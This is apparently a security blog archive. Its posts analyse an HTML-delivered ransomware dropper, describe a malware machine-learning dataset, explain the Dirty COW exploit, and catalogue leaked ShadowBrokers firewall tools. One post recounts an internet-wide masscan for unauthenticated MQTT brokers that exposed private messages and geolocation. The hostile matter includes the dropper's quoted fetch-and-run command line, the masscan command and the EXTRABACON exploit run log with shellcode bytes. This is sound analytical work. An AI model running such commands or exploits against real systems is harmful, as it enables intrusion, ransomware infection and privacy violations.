Sunday, February 12, 2017

Crypt0l0cker Revival !

A couple of days ago a colleague of mine gave me a "brand new" malicious content delivered by a single HTML page. The page was sent to an email box as part of a biggest attack. I found that vector particularly fun and so I'd like to share some of the steps who took me through a personal investigation path made not for professional usage but just for fun.

At first sight the HTML page looks like the following image.

Figure1: Attack Vector. A simple HTML page

A white backgrounded HTML page with a single line test on it saying: "print this document please". But what document ? Honestly I am in front of one of the ugliest "fake email" I ever seen. But let's move on and se what it really carries on. Opening the HTML content with a simple editor we might see a suspicious obfuscated Javascript. We are facing a first obfuscation stage. 

Figure2: Obfuscated First Stage

Since Javascript is an interpreted language (such as .NET or .Java) is not hard to understand its behavior, indeed after some rounds of "substitutions" and "concatenations" it easy to get the following clear text result showing the end of the first stage.

Figure3: Clear Text First Stage
That script is going to create an additional "script tag" on the current document by injecting an external script from: "". The injected script will be called with the following code signature: "saveAs(blob, 'image.js');" with 2 arguments: 
  1. blob. The raw content of "big_encoded_data" (please refer to Figure3)
  2. image.js. The saving name
In order to better understand what that function saveAs(blob, image.js) does we need to analyze the external FileServer.js. The entry point of the external script is the function "saveAs(arg1, arg2)" which has been defined as follows:

Figure4: FileServer.js Original Entry

saveAs(blob, name) is a simple wrapper function headed to FileServer constructor which is defined as follows:

Figure5: FileServer.js constructor

The script saves the "blob" content to the temporary folder giving to it a specific name (image.js in our case). As you might notice from the script content: "Apple do not allow, see " if the victims opens the file with Safari/Mail the attack vector will have no effect since Safari/Mail does not allow you to trigger the script on "" event. This is why I did't see any file when I opened the infected HTML content. Back to the original script (Figure3) we see the aveAs function called on page.load so the resulting image.js is going to be saved in the temporary local folder, in case of email clients, it will be triggered as soon as saved! So lets move on our next stage: the big_encoded_data variable (Figure3) which is going to be saved as image.js file. The big_encoded_data owns a first obfuscation stage made by encoding the downloader in base64. Once decoded from base64 and beautified the results looks like the following image

Figure6: Stage 2 base64 decoded obfuscated downloader

The downloader is still obfuscated by a high number of simple returning array-strings variables. It took almost 45 minutes to decode the entire second stage downloader. The resulting downloader is shown in the following image.

Figure7: Second Stage Downloader
A first check on fileSystem API and on the Element Type is super interesting (at least to me). We are analyzing an attack based on a specific file system, Windows native. The deobfuscated downloader grabs a file from "" and saves it to a temporary directory. By using ActiveXObject (Windows native) it saves the file and it runs it through command line c["run"]("cmd.exe /c " + f + g, "0"); where f takes the temporary folder f = b["GetSpecialFolder"]("2"); and g takes the temporary name g = b["GetTempName"]();.

This is the end of the second stage downloader.

The downloaded file is a PE Executable packed as well. Fortunately the used packer is the PiMP Stub by Nullsoft: a quite famous installer used by several software house.

Figure8: NullSoft Installer

The PiMP installer takes .dlls and runs them as the resulting software. The used resources are compressed in its own body by a well known algorithm: .7zip. Kation.DLL is the only DLL included in the dropped file and so it is the run DLL by PiMP installer. Kation wraps out ADVAPI32.DLL and KERNEL32.DLL as you might see from Figure9. ADVAPI32 is a core Microsoft library which includes the Microsoft encryption libraries such as: EncryptFileA, EncryptFileW and so on and so forth. It's not hard to guess a new Ransomware infection from that API calls.

Figure9: Usage of Encryption Libraries

From a static analysis prospective it becomes clear that some of the used strings are dynamically allocated. For example in sub_10001170 (frame 0XBC) several UFT-16 strings within decryption loop are involved showing out the control flow passing to Etymology.Vs (Figure11).

Figure10: Setting the running pointer

Figure11: Decoding Functions

The real behavior is hidden into the Etymology.Vs encrypted file included in the PiMP solution as well. Running the infected sample it disclosures its real behavior: shown in Figure12.

Figure12: Ransom Request

Here we go,  we have just discovered a brand new Crypt0L0cker ! it asks for bitcoin (Figure13), of course.  Looking at network communications, a Domain Name Generator Algorithm (DNGA), [wow, it sounds new from CryptoL0Cker !] fires up as soon as the dropped file is executed. It looks for valid registered subdomains belonging with  Until a valid Command and Control answers to the CryptoLocker client it hides itself and performs simple DNS query as follows:


The process to contact the Command and Control in order to exchange key and to notify the attacker could be very time consuming, in some of my runs it took until 2 hours depending on the available Command and Control at the time being. It would be very nice to have extra time to reverse the DNGA but unfortunately my weekend time is ending up. 

Figure13: Ransom Request Web Page

Development language is French, and many piece of code reminds me the "gaming world".   The main Command and Control domain is registered in Moscow (RU) and the registrant is "privacy protected".

Results for Target:
Created Date :2017-02-07T12:37:10Z
Updated Date :2017-02-08T10:38:54Z
Results for Target:
Created Date :2017-02-07T12:37:10Z
Updated Date :2017-02-08T10:38:54Z

The ransom page (available on the following link) is registered by EPAG Domain Sercives GmbH (Bonn, Germany) and is written in Franc language:

Ok Let's have some brand new IoC:

Malicious hashes:

Malicious urls:

- base dns:

.?????? (6 characters)


Enjoy your new IoC

Thursday, December 15, 2016

Malware Training Sets: A machine learning dataset for everyone

One of the most challenging tasks during Machine Learning processing is to define a great training (and possible dynamic) dataset. Assuming a well known learning algorithm and a periodic learning supervised process what you need is a classified dataset to best train your machine. Thousands of training datasets are available out there from "flowers" to "dices" passing through "genetics", but I was not able to find a great classified dataset for malware analyses. So, I decided to do it by myself and to share the dataset with the scientific community (and everybody interested on it) in order to give to everyone a base point to start with Machine Learning for Malware Analysis. The first challenge I faced was to define features and how to extract them.  Basically I had two choices:
  1. Extracting features directly from samples. This is the easiest solution since the possible extracted features would be directly related to the sample such as (but not limited to): file "sections", "entropy", "Syscalls" and decompiled assembly n-grams.
  2. Extracting features on samples analysis. This is the hardest solution since it would include both static analysis such as (but not limited to): file sections, entropy, "Syscall/API" and dynamic analysis such as (but not limited to): "Contacted IP", "DNS Queries", "execution processes", "AV signatures" , etc. etc. Plus I needed a complex system of dynamic analysis including multiple sandboxes and static analysers.   
I decided to follow the hardest path by extracting features from both: static analysis and dynamic analysis of samples detonation in order to collect as much features as I can letting to the data scientist the freedom to decide what feature to use and what feature to drop in his data mining process. The analyses where performed through the sample detonation in several SandBoxes (free and commercial ones) which defined a first stage of ontologically homogeneous blocks called "Analyses Results" (AR). AR are too much verbose and they are not  performing well in any text algorithm of my knowledge.

After more readings on the topic I came up with Malware Instruction Set for Behaviour Analysis ( MIST) described in Philipp Trinius et Al. (document available here).  MIST is basically a result based  optimised representation for effective and efficient analysis of behaviour using data mining and machine learning techniques. It can be obtained automatically during analysis of malware with a behaviour monitoring tool or by converting existing behaviour reports. The representation is not restricted to a particular monitoring tool and thus can also be used as a meta language to unify behaviour reports of different sources. The following image shows the MIST encoding structure. 

A simple example coming directly from the aforementioned paper is showed in the following image where "load.dll" has been detected. The ‘load dll’ system call is executed by every software during process initialisation and run-time several times, since under Windows, dynamic-link libraries (DLLs) are used to implement the Windows subsystem and offer an interface to the operating system. Following how the load.dll has been encoded into MIST meta language.

I decided to use the same concept of "meta language" but with auto-descriptive logic (without encoding the category operation since it would not afflict the analyses) and every information organised into a well formed JSON File rather then into a line based text file in order to be used in external environments with zero effort.  The produced datasets looks like following:

DataSet Snippest (click to enlarge)
Each JSON Property could be used as an algorithmic feature of your desired Machine Learning algorithm, but the most significative ones would be the "properties" ones (the one labelled properties). Each property, by meaning of each field placed under the "properties" section of the produced JSON file, is optional and is structured as follows:

category_action_with_description |  "sanitized" involved subjects with spaces

So for example:

"sig_copies_self": "e5ed769a e5ed769a 98e83379"

It means the category is sig (stands for signature) and the action is "copies itself".  e5ed769a e5ed769a 98e83379 are 3 sanitize evidences of where the samples copies itself (see the Sanitization Procedure) 

 "sig_antimalware_metascan": ""

It means the category is sig (stands for signature) and the action is "antimalware_metascan". The evidences are empty by meaning no signature found from metascan (in such a case).

"sig_antivirus_virustotal": "ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b"

It means the signature virus_total found 5 evidences (ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b).

A fundamental property is the "label" property which classifies the malware family. I decided to name this field "label" rather than: "malware_name", "malware_family" or "classification" in order to let the compatibility with many implemented machine learning algorithms which use the field "label" to properly work (it seems to be a defacto standards for many engine implementations).

Sanitization Procedures

Aim of the project is to provide an useful and classified dataset to researchers who want to investigate deeper in malware analysis by using Machine Learning techniques. It is essential to give a speed up in performances on text mining and for such a reason I decided to use some well known sanitization techniques in order to "hash" the evidences letting unchanged the meaning but drastically improving the speed for an algorithm point of view. The following picture shows the sanitization procedures:

Sanitization Procedures (click to enlarge)

From a developer prospective the cited (and showed) procedures are not well written; for example are not protected and ".replace" could be not safe within specific inputs. For such a reason I will not release such a code. But please keep in mind that the result of my project is not the "sanitization code" but the outcome of it: the classified malware analyses datased, so I focused my attention on features extraction, samples collection,  aggregation, conversion, and of course analyses, not really in developing production code.

Training DataSets Generation: The Simplified Process

The whole process to obtain the training datasets is described in the following flowchart. The detonation of a classified Malware into multiple sandboxes produces multiple static and dynamic analyses colliding into an analyses results artefact (AR).  AR would be translated into a MIST elaborated meta language to be software agnostic and to give freedom to data scientists.

Data Samples

Today (please refers to blog post date) the collected classified datasets is composed by the following samples:
  • APT1 292 Samples
  • Crypto 2024 Samples
  • Locker 434 Samples
  • Zeus 2014 Samples
If you own classified Malware samples and you want to share it with me in order to contribute at the Machine Learning Training Datasets you are welcome, just drop me an email !
I will definitely process the samples and build new datasets to share to everybody.

Where can I download the training datasets ?  HERE

Available Features and Frequency

The following list enumerates the available features per each sample. The features, as mentioned, are optional by meaning you might have no all the same features for every sample. If the sample you are analysing does not have a specific feature you want consider it as None (or undefined) since that feature was not available for the specified sample. So if you are writing your of machine learning algorithm you should include a "purification procedure" which will ignore None features from training and or query.

List of current available features with occurrences counter. :

   'file_access': 138759,
   'sig_infostealer_ftp': 13114,
   'sig_modifies_hostfile': 5,
   'sig_removes_zoneid_ads': 16,
   'sig_disables_uac': 33,
   'sig_static_versioninfo_anomaly': 0,
   'sig_stealth_webhistory': 417,
   'reg_write': 11942,
   'sig_network_cnc_http': 132,
   'api_resolv': 954690,
   'sig_stealth_network': 71,
   'sig_antivm_generic_bios': 6,
   'sig_polymorphic': 705,
   'sig_antivm_generic_disk': 7,
   'sig_antivm_vpc_keys': 0,
   'sig_antivm_xen_keys': 5,
   'sig_creates_largekey': 16,
   'sig_exec_crash': 6,
   'sig_antisandbox_sboxie_libs': 144,
   'sig_mimics_icon': 2,
   'sig_stealth_hidden_extension': 9,
   'sig_modify_proxy': 384,
   'sig_office_security': 20,
   'sig_bypass_firewall': 29,
   'sig_encrypted_ioc': 476,
   'sig_dropper': 671,
   'reg_delete': 2545,
   'sig_critical_process': 3,
   'service_start': 312,
   'net_dns': 486,
   'sig_ransomware_files': 5,
   'sig_virus': 781,
   'file_write': 20218,
   'sig_antisandbox_suspend': 2,
   'sig_sniffer_winpcap': 16,
   'sig_antisandbox_cuckoocrash': 11,
   'file_delete': 5405,
   'sig_antivm_vmware_devices': 1,
   'sig_ransomware_recyclebin': 0,
   'sig_infostealer_keylog': 44,
   'sig_clamav': 1350,
   'sig_packer_vmprotect': 1,
   'sig_antisandbox_productid': 18,
   'sig_persistence_service': 5,
   'sig_antivm_generic_diskreg': 162,
   'sig_recon_checkip': 4,
   'sig_ransomware_extensions': 4,
   'sig_network_bind': 190,
   'sig_antivirus_virustotal': 175975,
   'sig_recon_beacon': 23,
   'sig_deletes_shadow_copies': 24,
   'sig_browser_security': 216,
   'sig_modifies_desktop_wallpaper': 83,
   'sig_network_torgateway': 1,
   'sig_ransomware_file_modifications': 23,
   'sig_antivm_vbox_files': 7,
   'sig_static_pe_anomaly': 2194,
   'sig_copies_self': 591,
   'sig_antianalysis_detectfile': 51,
   'sig_antidbg_devices': 6,
   'file_drop': 6627,
   'sig_driver_load': 72,
   'sig_antimalware_metascan': 1045,
   'sig_modifies_certs': 46,
   'sig_antivm_vpc_files': 0,
   'sig_stealth_file': 1566,
   'sig_mimics_agent': 131,
   'sig_disables_windows_defender': 3,
   'sig_ransomware_message': 10,
   'sig_network_http': 216,
   'sig_injection_runpe': 474,
   'sig_antidbg_windows': 455,
   'sig_antisandbox_sleep': 271,
   'sig_stealth_hiddenreg': 13,
   'sig_disables_browser_warn': 20,
   'sig_antivm_vmware_files': 6,
   'sig_infostealer_mail': 617,
   'sig_ipc_namedpipe': 13,
   'sig_persistence_autorun': 2355,
   'sig_stealth_hide_notifications': 19,
   'service_create': 62,
   'sig_reads_self': 14460,
   'mutex_access': 15017,
   'sig_antiav_detectreg': 4,
   'sig_antivm_vbox_libs': 0,
   'sig_antisandbox_sunbelt_libs': 2,
   'sig_antiav_detectfile': 2,
   'reg_access': 774910,
   'sig_stealth_timeout': 1024,
   'sig_antivm_vbox_keys': 0,
   'sig_persistence_ads': 3,
   'sig_mimics_filetime': 3459,
   'sig_banker_zeus_url': 1,
   'sig_origin_langid': 71,
   'sig_antiemu_wine_reg': 1,
   'sig_process_needed': 137,
   'sig_antisandbox_restart': 24,
   'sig_recon_programs': 5318,
   'str': 1443775,
   'sig_antisandbox_unhook': 1364,
   'sig_antiav_servicestop': 78,
   'sig_injection_createremotethread': 311,
   'pe_imports': 301256,
   'sig_process_interest': 295,
   'sig_bootkit': 25,
   'reg_read': 458477,
   'sig_stealth_window': 1267,
   'sig_downloader_cabby': 50,
   'sig_multiple_useragents': 101,
   'pe_sec_character': 22180,
   'sig_disables_windowsupdate': 0,
   'sig_antivm_generic_system': 6,
   'cmd_exec': 2842,
   'net_con': 406,
   'sig_bcdedit_command': 14,
   'pe_sec_entropy': 22180,
   'pe_sec_name': 22180,
   'sig_creates_nullvalue': 1,
   'sig_packer_entropy': 3603,
   'sig_packer_upx': 1210,
   'sig_disables_system_restore': 6,
   'sig_ransomware_radamant': 0,
   'sig_infostealer_browser': 7,
   'sig_injection_rwx': 3613,
   'sig_deletes_self': 600,
    'file_read': 50632,
   'sig_fraudguard_threat_intel_api': 226,
   'sig_deepfreeze_mutex': 1,
   'sig_modify_uac_prompt': 1,
   'sig_api_spamming': 251,
   'sig_modify_security_center_warnings': 18,
   'sig_antivm_generic_disk_setupapi': 25,
   'sig_pony_behavior': 159,
   'sig_banker_zeus_mutex': 442,
   'net_http': 223,
   'sig_dridex_behavior': 0,
   'sig_internet_dropper': 3,
   'sig_cryptAM': 0,
   'sig_recon_fingerprint': 305,
   'sig_antivm_vmware_keys': 0,
   'sig_infostealer_bitcoin': 207,
   'sig_antiemu_wine_func': 0,
   'sig_rat_spynet': 3,
   'sig_origin_resource_langid': 2255

Cite The DataSet

If you find those results useful please cite them :

@misc{ MR,
   author = "Marco Ramilli",
   title = "Malware Training Sets: a machine learning dataset for everyone",
   year = "2016",
   url = "",
   note = "[Online; December 2016]"

Again, if you want to contribute ad you own classified Samples please drop them to me I will empower the dataset.

Enjoy your new researches!

Sunday, October 30, 2016

Dirty COW Notes

I am not used to write about vulnerabilities because there are too much vulnerabilities out here and writing about just one of them is not going to contribute security community at all. So why am I writing about Diry Cow ? I am going to write about it because, in my personal opinion, it is huge. When I say "huge" I don't really mean it will be used to exploit the "entire world" but I mean it highlights two mains issues:
  • Even patched code could easily hide the same vulnerability, just in a different way. How many patched code are not really "patched" ?
  • A new pragmatic approach to identify vulnerabilities: looking into patched code and check the  patch implementation.
But let's start from the beginning by taking a closer look to the exploit code.

Click to enlarge: Taken From Here

As many other kernel vulnerabilities it relays on concurrency; the exploit code fires on two separate threads who will access at the same time to the same resource.  Taking a closer look to the main function you will see that the mmap syscall has been used.

calling mmap function
From documentation:
creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.

mmap does not create a memory copy but rather it creates a new mapping of that (filedescriptor) memory area. It means the process will read data directly from the original file rather than from a copy of it.  While most of the parameters are obvious the MAP_PRIVATE flag is the "core" of the vulnerability. It enables the "copy on write" (from here the name COW) which basically copies the original data in a new memory area during the write access to the same data. Since the mmap has just mapped a readonly area and the process wants to write data on it, mmap (MAP_PRIVATE) will create a copy of that data on write actions, the modified data will not be propagated to the original memory area. 

Now the exploit runs two threads which will exploit a race condition to get "write access" to the original memory area. The first thread runs several times the function call madvise (memory advise) which is used to increase process performances by tagging a memory area according to its usage: for example  the memory could be tagged as NORMAL,  SEQUENTIAL, FREE or WILLNEED, an so on... In the exploit, the mmap memory is continuously tagged as DONTNEED,  which basically means the memory is not going to be used in the next future so the kernel could free its space and reload the content only when needed.

First Thread implementing madvise

On the other hand another thread is writing on its own memory space (by abusing the pseudo file notation: /proc/self/mem) directly on the mmap area pointing to the opened file. Since we have invoked the mmap function through the MAP_PRIVATE flag we are not going to write on the specifi memory but on a copy of it (copy on write).

Second Thread implementing write on pseudo self/mem

The race condition between those two threads tricks the write on copy on the original memory area since the copied area could be tagged has DONTNEED while the write procedure is not finished yet. And voilà you are going to write in a readonly file !

OK now we figured out how the trick worked so far but what is most interesting is the story behind it?

Going on issue tracker: Linus Trovalds (maximum respect) wrote:

This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself. Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger.
S390 is ancient IBM technology.... I am not even sure it still exists on real world (at least if compared to recent systems). Probably linux community forgot about that removal otherwise would left it in the recent memory managers.

Anyhow the bug now "has been fixed" by introducing a new internal Flag called FOLL_COW (really !?J) which basically says "yes I already did the copy on write".
Basically the process can write to even unwritable pte's, but only after it has gone through a COW cycle and they are dirty. Following the diff patch

Dirty Cow Patch3 on October 2016

Dirty Cow vulnerability blowed in my mind a new vulnerability hunting process. On one hand laboratories with extremely sophisticated, tuned and personalised fuzzers perform the "industrial" way (corporate and/or governative) to find new vulnerabilities, on the other hand more romantic and crafty way done by professionals and/or security researchers used to adopt handy works and smart choices. But another smart approach (industrial or romantic) could be to investigate into the patched code by itself.

Patched code is by definition where a bug or issue where located. The most difficult part of finding vulnerabilities (not exploiting them) is to figure out where they are in thousands lines of code. So finding vulnerability on patched code could be much more quick even if with high "hypothetical" complexity since a patch is involved. But as this case testifies ...  is not always the case!

Monday, October 17, 2016

Cybersecurity Awareness

My little contribution on cybersecurity to national TV channel; next to Evgenij Valentinovińć Kasperskij, founder of Kaspersky Anti Virus Engine.

Tuesday, September 20, 2016

Internet of Broken Things: Threats are changing, so are we ?

Hi Folks, this is another blog-post on internet of "broken things". As many of you are familiar with MQTT is one of the most used protocol over the Internet of Things. It's widely used in private area network - to make communications quick and light - and on public network as well - to build communication channels between sensors end / or servers messages -

MQTT is a machine-to-machine (M2M)/"Internet of Things" connectivity protocol. It was designed as an extremely lightweight publish/subscribe messaging transport. It is useful for connections with remote locations where a small code footprint is required and/or network bandwidth is at a premium. For example, it has been used in sensors communicating to a broker via satellite link, over occasional dial-up connections with healthcare providers, and in a range of home automation and small device scenarios. t is also ideal for mobile applications because of its small size, low power usage, minimised data packets, and efficient distribution of information to one or many receivers.

Inspired by Luca Lundgren talk on Defcon 24 titled: "Light Weight Protocol! Serious Equipment! Critical Implications!" I decided to verify myself the state of the art on MQTT implementations.

How MQTT works:

Understanding how MQTT protocol works, invented by Andy Stanford-Clark di IBM and Arlen Nipper Cirrus Link Solutions, is crucial to figure out why poorly authentication implementations will cause serious information disclosure issues.. MQTT stands for Message Queue Telemetry Transport and now is an OASIS standard. It has been designed for sending telemetry data and often runs the challenge against REST HTTP API in modern IoT environments. While is not a common protocol to build communication between clouds (and servers) since AMQP (Advanced Message Queuing Protocol) is much more expressive and performant it is often preferred to to build communication between small objects (things) to small objects (things). 

The protocol relays on a central node called "Broker" who is organised in specific programmable topics. Publishers (things) are able to publish informations to specific topics (such as but not limited to: temperature, localization, humidity, etc. ) while subscribers (applications) are able to get data from an interested and explicit topic. The following image represents a general architectural view. It's clear that a poorly implemented authentication mechanism will let the subscribers free to get the overall published data.

MQTT Architecture Flow
The beauty of unauthenticated MQTT sessions is in the subscriber topic list.  Indeed it is able to subscribe to every topic on the selected brokers by simply putting an # as topic even if it does not know the topics list.

Simple Experiment:

Let assume we might find some unauthenticated MQTT brokers, what kind of message could be identified ? Hopefully not sensible data. Let's see it !

Step 1: Discovery.
masscan even if not  assiduously upgraded is still one of my best solution to map Internet. I performed a simple massive scan in order to figure out servers with open ports on 1883 (it's the default MQTT broker port). I know... if a server owns a 1883 open port does not mean it runs a MQTT broker on it.. I totally agree but my point is not a quantitative analysis but a quality analysis, so I do not care about how many real MQTT brokers are out there but if I can find sensible data on one of them. 

sudo bin/masscan --exclude -p1883 --max-rate 10000 -oX mas1883.xml 

After few hours thousands of ip populate my "mas1883.xml" file

Step 2: Identification.
Assuming we get thousands of valid IPs running MQTT brokers we need to try to subscribe to all of them and try to subscribe to every topic. Let's write a quick'n dirty 20 lines of code to make it happens. 

Quick'n dirty script automation subscriptions (click to enlarge) 
Step 3: Results Analysis
After few running hours, I've got back interesting results (they were piped into different files from the launch bash script, so simple I did not even mentioned it). In order to describe the results I'd like to classify them into two simple sections: Note sensible data and Sensible data.

Not sensible data. MQTT messages that does not refer directly to sensible information but still interesting from attackers such as: Temperature,  Presence,  Lights sensors and commercial. If those informations get to malicious physical attacker's hands he can figure out if when to physically attack the building since it is easy to detect human presence. The following image shows  records belonging to Presence Sensors (PIR), Power Sensors, Humidity Sensors, Temperature Sensors and Noise Sensors.

Anonymised Not Sensible Data (click to enlarge)
For example an attacker could use those data to understand if in a room -- of such anonymised building -- are people in there (thanks to the value of the PIR sensor) or if someone is close to the room (thanks to noise sensors) or if somebody has been in the room (thanks to delta temperature sensors). Those informations are useful to plan an attack. So even these informations are not sensible per se it is still important to protect them. 

Another great example comes from an unauthenticated server hosting Samsung Smartthings devices.

Samsung Smartthings devices data (click to enlarge)
As you might see (enlarging the previous image.. :) we can totally monitor the "building". We know where sensors have been placed (network_cabinet, master_bedroom, parkers_closet, garage_door, home_assistant)  and what value do they have. It is not hard to find an empty room or an empty room_door_path to a target in the building.

Sensible data. MQTT data that directly refers to private information such as (but not limited to): Text Messages and Phone Geolocalization.  The following image shows text messages between two users. The used language is Italian and a close translation could be:
- "Talk to you soon"
- "Bye"

Anonymised Private Messages (click to enlarge)

The following image shows private information between pharmaceutical products (please do not ask me more about it... I wont give out much details, the pharmaceutical service has been alerted).

Anonymised Private Message between pharmaceutical services (click to enlarge)

The following image shows an interesting "spying" service (actually it's which communicates geo-location over MQTT unauthenticated brokers.

Geo-location tracks (click to enlarge)

Naturally such a private information should not be freely accessible. For example knowing where people are without their permissions is illegal in many states, or reading their application messages without judiciary consent is illegal in many states as well. Naturally the correlation to such information is illegal as well. Unfortunately attackers are everywhere and thanks to internet and telecommunication their malicious activities could have global impacts. Nowadays everybody has got a smart devices, everybody keeps trace of own steps, everybody keeps monitored own heart and everybody put everything on a cloud who does not belong to him. On the other hand applications are not always well protected making data freely available and exposing data owner to incredible indirect risks.

Final Thoughts:
Unfortunately Is not possible to stop this process: Tomorrow there will be more smart things that today. Unfortunately is not possible to protect everything: products have to get to the market as quick as possible to gain market. This process is quicker than the ability of the security community to safely test everything. De facto we will continue to use even more "smart things" which will monitor everything about our life.

Threats are changing, so are we  ?  

Tuesday, August 23, 2016

Summing up the ShadowBrokers Leak

Nowadays it's almost impossible to not write about EquationGroup Leak, so I'm going to start my "blog post" pushing the following picture (realised by Kaspersky Lab) which would cut-out every doubts about the leak paternity.

EquationGroup VS ShadowBrokers's Leak

The leaked dump contains a set of exploits, implants and tools for hacking firewalls (code name: "Firewall Operations").  Let's have a quick look to them:


Following a list of exploit found on the published leak. Please refer to sources at the bottom of the page for original writing about them.

EGREGIOUSBLUNDER. It is a remote code execution exploit for Fortigate firewalls. It leverages an HTTP cookie overflow and is different from CVE-2006-6493 as noted by Avast. Models affected include 60, 60M, 80C, 200A, 300A, 400A, 500A, 620B, 800, 5000, 1000A, 3600, and 3600A.

ELIGIBLEBACHELOR This is an exploit with an unclear attack vector for TOPSEC firewalls running TOS operating system versions,, and attack vector is unknown but it has an XML-like payload that starts with .

ELIGIBLEBOMBSHELL It is a remote code execution exploit for TOPSEC firewalls. It exploits an HTTP cookie command injection vulnerability and uses ETag examination for version detection. Versions affected include to 

WOBBLYLLAMA A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version

FLOCKFORWARD A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version

HIDDENTEMPLE A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.2.8840.1.

CONTAINMENTGRID A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.

GOTHAMKNIGHT A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version Has no BLATSTING support.

ELIGIBLECANDIDATE A remote code execution exploit for TOPSEC firewalls that exploits a HTTP cookie command injection vulnerability, affecting versions to

ELIGIBLECONTESTANT A remote code execution exploit for TOPSEC firewalls that exploits a HTTP POST paramter injection vulnerability, affecting versions to This exploit can be tried after ELIGIBLECANDIDATE.

EPICBANANA A privilege escalation exploit against Cisco Adaptive Security Appliance (ASA) and Cisco Private Internet eXchange (PIX) devices. Exploitation takes advantage of default Cisco credentials (password: cisco). Affects ASA versions 711, 712, 721, 722, 723, 724, 80432, 804, 805, 822, 823, 824, 825, 831, 832 and PIX versions 711, 712, 721, 722, 723, 724, 804.

ESCALATEPLOWMAN A privilege escalation exploit against WatchGuard firewalls of unknown versions that injects code via the ifconfig command.

EXTRABACON A remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices affecting ASA versions 802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844. It exploits an overflow vulnerability using the Simple Network Management Protocol (SNMP) and relies on knowing the target's uptime and software version.

BOOKISHMUTE An exploit against an unknown firewall using Red Hat 6.0.

FALSEMOREL Allows for the deduction of the "enable" password from data freely offered by an unspecified firewall (likely Cisco) and obtains privileged level access using only the hash of the "enable" password. Requires telnet to be installed on the firewall's inside interface.

Cisco exploits by vulnerabilities:

Cisco Admits Unknown Vulnerabilities


Following a list of Implants found on the leaked dump.

BLATSTING A firewall software implant that is used with EGREGIOUSBLUNDER (Fortigate) and ELIGIBLEBACHELOR (TOPSEC). 

BANANAGLEE A non-persistent firewall software implant for Cisco ASA and PIX devices that is installed by writing the implant directly to memory. Also mentioned in the previously leaked NSA ANT catalogue. 

BANANABALLOT A BIOS module associated with an implant (likely BANANAGLEE). 

BEECHPONY A firewall implant that is a predecessor of BANANAGLEE. 

JETPLOW A firmware persistence implant for Cisco ASA and PIX devices that persists BANANAGLEE. Also mentioned in the previously leaked NSA ANT catalogue.
JETPLOW evidence on leaked USA Secret Documents


BARGLEE A firewall software implant. Unknown vendor. 

BUZZDIRECTION A firewall software implant for Fortigate firewalls. 

FEEDTROUGH A technique for persisting BANANAGLEE and ZESTYLEAK implants for Juniper NetScreen firewalls. Also mentioned in the previously leaked NSA ANT catalogue. 

JIFFYRAUL A module loaded into Cisco PIX firewalls with BANANAGLEE. 

BANNANADAIQUIRI An implant associated with SCREAMINGPLOW. Yes, banana is spelled with three Ns this time. 

POLARPAWS A firewall implant. Unknown vendor. 

POLARSNEEZE A firewall implant. Unknown vendor. 

ZESTYLEAK A firewall software implant for Juniper NetScreen firewalls that is also listed as a module for BANANAGLEE. Also mentioned in the previously leaked NSA ANT catalogue. 

SECONDDATE A packet injection module for BANANAGLEE and BARGLEE. 

BARPUNCH A module for BANANAGLEE and BARGLEE implants. 

BBALL A module for BANANAGLEE implants.

BBALLOT A module for BANANAGLEE implants. 

BBANJO A module for BANANAGLEE implants. 

BCANDY A module for BANANAGLEE implants.  

BFLEA A module for BANANAGLEE implants. 

BMASSACRE A module for BANANAGLEE and BARGLEE implants. 

BNSLOG A module for BANANAGLEE and BARGLEE implants. 

BPATROL A module for BANANAGLEE implants. 

BPICKER A module for BANANAGLEE implants. 

BPIE A module for BANANAGLEE and BARGLEE implants. 

BUSURPER A module for BANANAGLEE implants. 

CLUCKLINE A module for BANANAGLEE implants.


Following a list of implemented tools found along the leaked dump.

BILLOCEAN Retrieves the serial number of a firewall, to be recorded in operation notes. Used in conjunction with EGREGIOUSBLUNDER for Fortigate firewalls.

FOSHO A Python library for creating HTTP exploits.

BARICE A tool that provides a shell for installing the BARGLEE implant.

DURABLENAPKIN A tool for injecting packets on LANs.

BANANALIAR A tool for connecting to an unspecified implant (likely BANANAGLEE).

PANDAROCK A tool for connecting to a POLARPAWS implant.

TURBOPANDA A tool that can be used to communicate with a HALLUXWATER implant. Also mentioned in the previously leaked NSA ANT catalogue.

TEFLONDOOR A self-destructing post-exploitation shell for executing an arbitrary file. The arbitrary file is first encrypted with a key.

1212/DEHEX Converts hexademical strings to an IP addresses and ports.

XTRACTPLEASING Extracts something from a file and produces a PCAP file as output.

NOPEN A post-exploitation shell consisting of a client and a server that encrypts data using RC6. The server is installed on the target machine.

BENIGNCERTAIN A tool that appears to be for sending certain types of Internet Key Exchange (IKE) packets to a remote host and parsing the response.


This is a running example of extrabacon exploit, just to be sure it will work even in my lab environment.

 mr@mrtestbox:~$ ./ exec -k F_RlDw -v -t -c cisco --mode pass-enable  
 WARNING: No route found for IPv6 destination :: (no default route?)  
 Logging to /home/marcoramilli/concernedparent  
 [+] Executing: ./ exec -k F_RlDw -v -t -c cisco --mode pass-enable  
 [+] running from /home/marcoramilli  
 Data stored in self.vinfo: ASA803  
 [+] generating exploit for exec mode pass-enable  
 [+] using shellcode in ./versions  
 [+] importing version-specific shellcode shellcode_asa803  
 [+] building payload for mode pass-enable  
 appended PMCHECK_ENABLE payload eb14bf7082090931c9b104fcf3a4e92f0000005e  
 appended AAAADMINAUTH_ENABLE payload eb14bfb060060831c9b104fcf3a4e92f0000005eebece8f8ffffff5  
 [+] random SNMP request-id 425297185  
 [+] fixing offset to payload 49  
 overflow (112):  
 *** output omitted ****  
